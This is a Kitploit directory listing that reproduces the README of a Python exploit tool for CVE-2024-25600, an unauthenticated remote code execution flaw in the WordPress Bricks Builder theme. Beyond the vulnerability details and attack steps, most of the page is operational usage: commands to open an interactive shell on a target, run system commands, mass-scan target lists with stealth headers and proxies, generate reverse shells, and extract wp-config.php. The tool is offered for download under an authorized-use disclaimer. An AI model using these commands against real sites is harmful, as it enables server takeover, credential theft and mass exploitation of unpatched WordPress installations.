Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with interactive shell, reverse shells, file upload/download, async scanning, stealth mode, proxy support, and multi-threaded vulnerability scanning. For authorized security testing only. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
ReconnaissanceVulnerability ScannersExploitationShellcodeWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed Teaming

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Payload Development
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

View Repository
1162 months agoNot yet reviewed

About

CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with interactive shell, reverse shells, file upload/download, async scanning, stealth mode, proxy support, and multi-threaded vulnerability scanning. For authorized security testing only.

Share

BricksRCE Exploiter

CVE-2024-25600 — WordPress Bricks Builder Unauthenticated RCE

Python Version CVSS CVE License Platform

Authorized security assessment tool for CVE-2024-25600
Author: Sudeepa Wanigarathna · Tool: BricksRCE Exploiter v1.0
Main script: cve-2024-25600.py

b

[!IMPORTANT] Authorized use only. This tool is for security research, education, and testing systems you own or have explicit written permission to assess. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.


Table of Contents

  • Overview
  • Vulnerability Details
  • Features
  • Installation
  • Quick Start
  • Usage Guide
  • Command Reference
  • Interactive Shell
  • Output & Logging
  • Troubleshooting
  • Repository Layout
  • Version History
  • Disclaimer
  • Author & Credits
  • License

Overview

CVE-2024-25600 is a critical, unauthenticated remote code execution vulnerability in the WordPress Bricks Builder theme. Improper handling of user-controlled input in the render_element REST endpoint allows unauthenticated attackers to execute arbitrary PHP/system commands on affected installations.

BricksRCE Exploiter (cve-2024-25600.py) is a full-featured Python assessment tool for authorized security professionals to:

  • Detect vulnerable Bricks Builder installations
  • Validate impact with controlled command execution
  • Interact with compromised hosts via an interactive shell
  • Mass-scan target lists with async/threaded workers
  • Export structured results for reporting

Vulnerability Details

AttributeValue
CVE IDCVE-2024-25600
CVSS9.8 (Critical)
Attack VectorNetwork — unauthenticated
ImpactFull remote code execution, confidentiality / integrity / availability compromise
Affected ProductWordPress Bricks Builder theme
Affected VersionsBricks ≤ 1.9.6 (patched in 1.9.6.1+)
Vulnerability TypeUnauthenticated Remote Code Execution
CWECWE-94 (Improper Control of Generation of Code)

Affected Endpoints

EndpointMethod
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

Attack Summary

  1. Extract a Bricks nonce from the target page source
  2. Submit a crafted render_element request with a malicious element payload
  3. Server-side code evaluation leads to arbitrary command execution

References

  • CVE-2024-25600 (MITRE)
  • NVD Entry
  • Bricks Builder Changelog / Security Advisory

Features

Core Capabilities

CapabilityDescription
Vulnerability detectionConfirms RCE via controlled marker-based probe
Nonce extractionMulti-method nonce discovery (scripts, page source, meta, REST)
Version detectionIdentifies Bricks Builder version from CSS / readme / REST
Interactive shellFull REPL with history, autocomplete, and file transfer
Single-command modeExecute one command and exit (scripting-friendly)
Reverse shell helpersGenerate bash / nc / Python / PHP / Perl / Ruby reverse shells
wp-config extractionAttempts to locate and read wp-config.php
Mass scanningAsync or threaded multi-target scanning from a URL list

Operational Controls

CapabilityDescription
Rate limitingConfigurable delay between requests
Retry logicExponential backoff on timeouts and connection errors
User-Agent rotationRandom browser fingerprints per request
Stealth modeRandomized Accept-Language / Accept-Encoding headers
Proxy supportHTTP, HTTPS, SOCKS5 / SOCKS5h
Dual endpointsPrefer wp-json, rest_route, or both
Force modeSkip pre-check and attempt exploitation directly
Rich CLIProgress bars, tables, and colored panels via Rich

Reporting

CapabilityDescription
JSON / TXT exportSave scan results and vulnerable targets
Command historyOptional logging of executed commands
File loggingPersistent bricks_rce.log plus custom log paths

Installation

Prerequisites

  • Python 3.8+
  • pip
  • Network reachability to authorized target(s)

Setup

git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

Dependencies

requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # optional — SOCKS5 proxy support

Quick Start

Replace https://target.example with a lab or authorized target only.

# Interactive shell
python3 cve-2024-25600.py -u https://target.example

# Single command
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# Mass scan
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# Version detection
python3 cve-2024-25600.py -u https://target.example --detect-version

# Through Burp proxy
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

Usage Guide

All examples use the main script: cve-2024-25600.py

1. Show help

python3 cve-2024-25600.py --help

2. Single-target interactive shell

Opens an interactive RCE shell after confirming the target is vulnerable.

python3 cve-2024-25600.py -u https://target.example

Workflow:

  1. Normalize and validate the URL
  2. Extract nonce from the page
  3. Verify vulnerability (unless --force)
  4. Drop into an interactive shell

3. Execute a single command

python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

Save command output to a file:

python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. Choose payload type

# Default PHP exception-based payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() based payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Detect Bricks Builder version

python3 cve-2024-25600.py -u https://target.example --detect-version

Combine with a command:

python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. Extract wp-config.php

python3 cve-2024-25600.py -u https://target.example --extract-wp-config

Saved as wp-config_<target>.txt on success.

Download Tool